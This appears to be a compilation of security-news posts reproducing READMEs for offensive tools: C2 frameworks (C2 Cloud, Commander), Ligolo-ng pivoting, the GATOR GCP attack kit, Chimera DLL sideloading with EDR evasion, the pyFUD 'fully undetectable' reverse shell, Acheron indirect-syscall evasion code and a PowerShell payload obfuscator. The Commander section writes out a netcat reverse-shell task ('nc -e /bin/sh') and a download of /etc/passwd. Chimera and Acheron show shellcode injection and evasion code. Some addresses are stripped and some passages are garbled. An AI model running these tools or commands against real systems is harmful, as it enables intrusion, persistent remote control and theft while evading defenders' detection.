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C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

By: Zion3R

The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2


C2 Cloud walkthrough:
Ransomware simulation using C2 Cloud:
Telegram C2:

Key Features

πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
🌐 Nginx: Effortlessly routing traffic between web and backend systems.
πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.


Application setup

  • Management port: 9000
  • Reversse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.


Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.


Distributed under the MIT License. See LICENSE for more information.


Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R

Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.

Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup


Further Reading

Post Name Publication Date Link
Hacking With Your Nemesis Aug 9, 2023
Challenges In Post-Exploitation Workflows Aug 2, 2023
On (Structured) Data Jul 26, 2023


Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.

Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng


When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up


You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
β”‚ Interface 3 β”‚
β”‚ Name β”‚ wlp3s0 β”‚
β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
β”‚ MTU β”‚ 1500 β”‚
β”‚ Flags β”‚ up|broadcast|multicast β”‚
β”‚ IPv4 Address β”‚ β”‚

Add a route on the proxy/relay server to the agent network.


$ sudo ip route add dev ligolo


> netsh int ipv4 show interfaces

Idx MΓ©t MTU Γ‰tat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add mask if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the agent network from the proxy server.

$ nmap -v -sV -n
$ rdesktop

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent ( and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr --to --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
β”‚ Active listeners β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
β”‚ 0 β”‚ nchatelain@nworkstation β”‚ β”‚ β”‚

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.



Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)


You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c -p 24483
Connecting to host, port 24483
[ 5] local port 50654 connected to port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver


Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.


  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.


  • Nicolas Chatelain <nicolas -at->

GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R

GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Resource Category Primary Module Command Group Operation Description
User Authentication auth - activate Activate a Specific Authentication Method
- add Add a New Authentication Method
- delete Remove a Specific Authentication Method
- list List All Available Authentication Methods
Cloud Functions functions - list List All Deployed Cloud Functions
- permissions Display Permissions for a Specific Cloud Function
- triggers List All Triggers for a Specific Cloud Function
Cloud Storage storage buckets list List All Storage Buckets
permissions Display Permissions for Storage Buckets
Compute Engine compute instances add-ssh-key Add SSH Key to Compute Instances


Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via

git clone
python install

Automated Installation via pip

pip install gator-red


Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!


Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.


I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)

Commander - A Command And Control (C2) Server

By: Zion3R

Commander is a command and control framework (C2) written in Python, Flask and SQLite. ItΒ comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API


  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems


Python >= 3.6 is required to run and the following dependencies

Linux for the and (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the module first in order to create a local sqlite db file


Continue by running the server


And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

# python agent

# C agent
gcc agent.c -o agent -lcurl -lb64

By default both the Agents and the server are running over TLS and base64. The communication point is set to and in case a different point is needed it should be changed in Agents source files.

As the Operator/Administrator you can use the following commands to control your agents


task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

Bye Bye!


sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.


Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To setup your environment start the first and then the and run the agent. After you can check the availiable agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

To check the history/ previous results of executed tasks for a specific agent do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval of the agents that checks for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session like with netcat or metaspolit do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 4444

This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.


The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

Edit the file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/

You can run it like this:


# and to run the agent, do as usual

Tips &Tricks

  1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b --certfile server.crt --keyfile server.key 
  1. Create a binary file for your python agent like this
pip install pyinstaller
pyinstaller --onefile

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  1. Create new certs in each engagement

  2. Backup your c2.db, it is easy... just a file


pytest was used for the testing. You can run the tests like this:

cd tests/

Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.

Chimera - Automated DLL Sideloading Tool With EDR Evasion Capabilities

By: Zion3R

While DLL sideloading can be used for legitimate purposes, such as loading necessary libraries for a program to function, it can also be used for malicious purposes. Attackers can use DLL sideloading to execute arbitrary code on a target system, often by exploiting vulnerabilities in legitimate applications that are used to load DLLs.

To automate the DLL sideloading process and make it more effective, Chimera was created a tool that include evasion methodologies to bypass EDR/AV products. These tool can automatically encrypt a shellcode via XOR with a random key and create template Images that can be imported into Visual Studio to create a malicious DLL.

Also Dynamic Syscalls from SysWhispers2 is used and a modified assembly version to evade the pattern that the EDR search for, Random nop sleds are added and also registers are moved. Furthermore Early Bird Injection is also used to inject the shellcode in another process which the user can specify with Sandbox Evasion mechanisms like HardDisk check & if the process is being debugged. Finally Timing attack is placed in the loader which using waitable timers to delay the execution of the shellcode.

This tool has been tested and shown to be effective at bypassing EDR/AV products and executing arbitrary code on a target system.

Tool Usage

Chimera is written in python3 and there is no need to install any extra dependencies.

Chimera currently supports two DLL options either Microsoft teams or Microsoft OneDrive.

Someone can create userenv.dll which is a missing DLL from Microsoft Teams and insert it to the specific folder to


For Microsoft OneDrive the script uses version DLL which is common because its missing from the binary example onedriveupdater.exe

Chimera Usage.

python3 ./ met.bin chimera_automation notepad.exe teams

python3 ./ met.bin chimera_automation notepad.exe onedrive

Additional Options

  • [raw payload file] : Path to file containing shellcode
  • [output path] : Path to output the C template file
  • [process name] : Name of process to inject shellcode into
  • [dll_exports] : Specify which DLL Exports you want to use either teams or onedrive
  • [replace shellcode variable name] : [Optional] Replace shellcode variable name with a unique name
  • [replace xor encryption name] : [Optional] Replace xor encryption name with a unique name
  • [replace key variable name] : [Optional] Replace key variable name with a unique name
  • [replace sleep time via waitable timers] : [Optional] Replace sleep time your own sleep time

Usefull Note

Once the compilation process is complete, a DLL will be generated, which should include either "version.dll" for OneDrive or "userenv.dll" for Microsoft Teams. Next, it is necessary to rename the original DLLs.

For instance, the original "userenv.dll" should be renamed as "tmpB0F7.dll," while the original "version.dll" should be renamed as "tmp44BC.dll." Additionally, you have the option to modify the name of the proxy DLL as desired by altering the source code of the DLL exports instead of using the default script names.

Visual Studio Project Setup

Step 1: Creating a New Visual Studio Project with DLL Template

  1. Launch Visual Studio and click on "Create a new project" or go to "File" -> "New" -> "Project."
  2. In the project templates window, select "Visual C++" from the left-hand side.
  3. Choose "Empty Project" from the available templates.
  4. Provide a suitable name and location for the project, then click "OK."
  5. On the project properties window, navigate to "Configuration Properties" -> "General" and set the "Configuration Type" to "Dynamic Library (.dll)."
  6. Configure other project settings as desired and save the project.Β 


Step 2: Importing Images into the Visual Studio Project

  1. Locate the "chimera_automation" folder containing the necessary Images.
  2. Open the folder and identify the following Images: main.c, syscalls.c, syscallsstubs.std.x64.asm.
  3. In Visual Studio, right-click on the project in the "Solution Explorer" panel and select "Add" -> "Existing Item."
  4. Browse to the location of each file (main.c, syscalls.c, syscallsstubs.std.x64.asm) and select them one by one. Click "Add" to import them into the project.
  5. Create a folder named "header_Images" within the project directory if it doesn't exist already.
  6. Locate the "syscalls.h" header file in the "header_Images" folder of the "chimera_automation" directory.
  7. Right-click on the "header_Images" folder in Visual Studio's "Solution Explorer" panel and select "Add" -> "Existing Item."
  8. Browse to the location of "syscalls.h" and select it. Click "Add" to import it into the project.

Step 3: Build Customization

  1. In the project properties window, navigate to "Configuration Properties" -> "Build Customizations."
  2. Click the "Build Customizations" button to open the build customization dialog.

Step 4: Enable MASM

  1. In the build customization dialog, check the box next to "masm" to enable it.
  2. Click "OK" to close the build customization dialog.


Step 5:

  1. Right click in the assembly file β†’ properties and choose the following
  2. Exclude from build β†’ No
  3. Content β†’ Yes
  4. Item type β†’ Microsoft Macro Assembler

Final Project Setup

Compiler Optimizations

Step 1: Change optimization

  1. In Visual Studio choose Project β†’ properties
  2. C/C++ Optimization and change to the following


Step 2: Remove Debug Information's

  1. In Visual Studio choose Project β†’ properties
  2. Linker β†’ Debugging β†’ Generate Debug Info β†’ No

Liability Disclaimer:

To the maximum extent permitted by applicable law, myself(George Sotiriadis) and/or affiliates who have submitted content to my repo, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource


pyFUD - Multi Clients FUD Reverse Shell

By: Zion3R

python3 based multi clients reverse shell.


1. Don't Upload Any Payloads To Bcz This tool will not work
with Time.
2. Virustotal Share Signatures With AV Comapnies.
3. Again Don't be an Idiot!


1. git clone
2. python3 (enter your ip,port and start the server)
3. (Edit IP AND PORT To Put Your Own IP,Port)


1. python3
2. Now Compile to exe (make sure change ip and port in it)


1. Very Simple And Fully Undectable Reverse Shell
2. Multi Client Handling
3. Persistent Shell
3. auto-reconnect
5. U can Convert to exe using pyinstaller tool in windows.


Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.

Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#

By: Zion3R

Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.

This is a project that I started working on as I progressed through Offensive Security's PEN-300 course. One of my favorite modules from the course is the process injection & migration section which inspired me to be build a tool to help me be more efficient in during that activity. A special thanks goes out to ShadowKhan who provided valuable feedback which helped provide creative direction to make this utility visually appealing and enhanced its usability with suggested filtering capabilities.


Injection Enumeration >> Usage: wanderer [target options] <value> [filter options] <value> [output options] <value> Target Options: -i, --id, Target a single or group of processes by their id number -n, --name, Target a single or group of processes by their name -c, --current, Target the current process and reveal the current privilege level -a, --all, Target every running process Filter Options: --include-denied, Include instances where process access is denied --exclude-32, Exclude instances where the process architecture is 32-bit --exclude-64, Exclude instances where the process architecture is 64-bit --exclude-amsiloaded, Exclude instances where amsi.dll is a loaded process module --exclude-amsiunloaded, Exclude instances where amsi is not loaded process module --exclude-integrity, Exclude instances where the process integrity level is a specific value Output Options: --output-nested, Output the results in a nested style view -q, --quiet, Do not output the banner Examples: Enumerate the process with id 12345 C:\> wanderer --id 12345 Enumerate all processes with the names process1 and processs2 C:\> wanderer --name process1,process2 Enumerate the current process privilege level C:\> wanderer --current Enumerate all 32-bit processes C:\wanderer --all --exclude-64 Enumerate all processes where is AMSI is loaded C:\> wanderer --all --exclude-amsiunloaded Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32" dir="auto">
PS C:\> .\wanderer.exe

>> Process Injection Enumeration

Usage: wanderer [target options] <value> [filter options] <value> [output options] <value>

Target Options:

-i, --id, Target a single or group of processes by their id number
-n, --name, Target a single or group of processes by their name
-c, --current, Target the current process and reveal the current privilege level
-a, --all, Target every running process

Filter Options:

--include-denied, Include instances where process access is denied
--exclude-32, Exclude instances where the process architecture is 32-bit
--exclude-64, Exclude instances where the process architecture is 64-bit
--exclude-amsiloaded, Exclude instances where amsi.dll is a loaded proces s module
--exclude-amsiunloaded, Exclude instances where amsi is not loaded process module
--exclude-integrity, Exclude instances where the process integrity level is a specific value

Output Options:

--output-nested, Output the results in a nested style view
-q, --quiet, Do not output the banner


Enumerate the process with id 12345
C:\> wanderer --id 12345

Enumerate all processes with the names process1 and processs2
C:\> wanderer --name process1,process2

Enumerate the current process privilege level
C:\> wanderer --current

Enumerate all 32-bit processes
C:\wanderer --all --exclude-64

Enumerate all processes where is AMSI is loaded
C:\> wanderer --all --exclude-amsiunloaded

Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes
C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32


Example 1

Example 2

Example 3

Example 4

Example 5

Acheron - Indirect Syscalls For AV/EDR Evasion In Go Assembly

By: Zion3R

Acheron is a library inspired by SysWhisper3/FreshyCalls/RecycledGate, with most of the functionality implemented in Go assembly.

acheron package can be used to add indirect syscall capabilities to your Golang tradecraft, to bypass AV/EDRs that makes use of usermode hooks and instrumentation callbacks to detect anomalous syscalls that don't return to ntdll.dll, when the call transition back from kernel->userland.

Main Features

  • No dependencies
  • Pure Go and Go assembly implementation
  • Custom string encryption/hashing function support to counter static analysis

How it works

The following steps are performed when creating a new syscall proxy instance:

  1. Walk the PEB to retrieve the base address of in-memory ntdll.dll
  2. Parse the exports directory to retrieve the address of each exported function
  3. Calculate the system service number for each Zw* function
  4. Enumerate unhooked/clean syscall;ret gadgets in ntdll.dll, to be used as trampolines
  5. Creates the proxy instance, which can be used to make indirect (or direct) syscalls


Integrating acheron into your offsec tools is pretty easy. You can install the package with:

go get -u

Then just need to call acheron.New() to create a syscall proxy instance and use acheron.Syscall() to make an indirect syscall for Nt* APIs.

Minimal example:

package main

import (


func main() {
var (
baseAddr uintptr
hSelf = uintptr(0xffffffffffffffff)

// creates Acheron instance, resolves SSNs, collects clean trampolines in ntdll.dlll, etc.
ach, err := acheron.New()
if err != nil {

// indirect syscall for NtAllocateVirtualMemory
s1 := ach.HashString("NtAllocateVirtualMemory")
if retcode, err := ach.Syscall(
s1, // function name hash
hSelf, // arg1: _In_ HANDLE ProcessHandle,
uintptr(unsafe.Pointer(&baseAddr)), // arg2: _Inout_ PVOID *BaseAddress,
uintptr(unsafe.Pointer(nil)), // arg3: _In_ ULONG_PTR ZeroBits,
0x1000, // arg4: _Inout_ PSIZE_T RegionSize,
windows.MEM_COMMIT|windows.MEM_RESERVE, // arg5: _In_ ULONG AllocationType,
windows.PAGE_EXECUTE_READWRITE, // arg6: _In_ ULONG Protect
); err != nil {
"allocated memory with NtAllocateVirtualMemory (status: 0x%x)\n",

// ...


The following examples are included in the repository:

Example Description
sc_inject Extremely simple process injection PoC, with support for both direct and indirect syscalls
process_snapshot Using indirect syscalls to take process snapshots with syscalls
custom_hashfunc Example of custom encoding/hashing function that can be used with acheron

Other projects that use acheron:


Contributions are welcome! Below are some of the things that it would be nice to have in the future:

  • 32-bit support
  • Other resolver types (e.g. HalosGate/TartarusGate)
  • More examples

If you have any suggestions or ideas, feel free to open an issue or a PR.


Additional Notes

The name is a reference to the Acheron river in Greek mythology, which is the river where souls of the dead are carried to the underworld.

This project uses semantic versioning. Minor and patch releases should not break compatibility with previous versions. Major releases will only be used for major changes that break compatibility with previous versions.

This project has been created for educational purposes only. Don't use it to on systems you don't own. The developer of this project is not responsible for any damage caused by the improper usage of the library.


This project is licensed under the MIT License - see the LICENSE file for details

Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You'Re On Windows Or Kali Linux

Traditional obfuscation techniques tend to add layers to encapsulate standing code, such as base64 or compression. These payloads do continue to have a varied degree of success, but they have become trivial to extract the intended payload and some launchers get detected often, which essentially introduces chokepoints.

The approach this tool introduces is a methodology where you can target and obfuscate the individual components of a script with randomized variations while achieving the same intended logic, without encapsulating the entire payload within a single layer. Due to the complexity of the obfuscation logic, the resulting payloads will be very difficult to signature and will slip past heuristic engines that are not programmed to emulate the inherited logic.

While this script can obfuscate most payloads successfully on it's own, this project will also serve as a standing framework that I will to use to produce future functions that will utilize this framework to provide dedicated obfuscated payloads, such as one that only produces reverse shells.

I wrote a blog piece for Offensive Security as a precursor into the techniques this tool introduces. Before venturing further, consider giving it a read first:

Dedicated Payloads

As part of my on going work with PowerShell obfuscation, I am building out scripts that produce dedicated payloads that utilize this framework. These have helped to save me time and hope you find them useful as well. You can find them within their own folders at the root of this repository.

  1. Get-ReverseShell
  2. Get-DownloadCradle
  3. Get-Shellcode


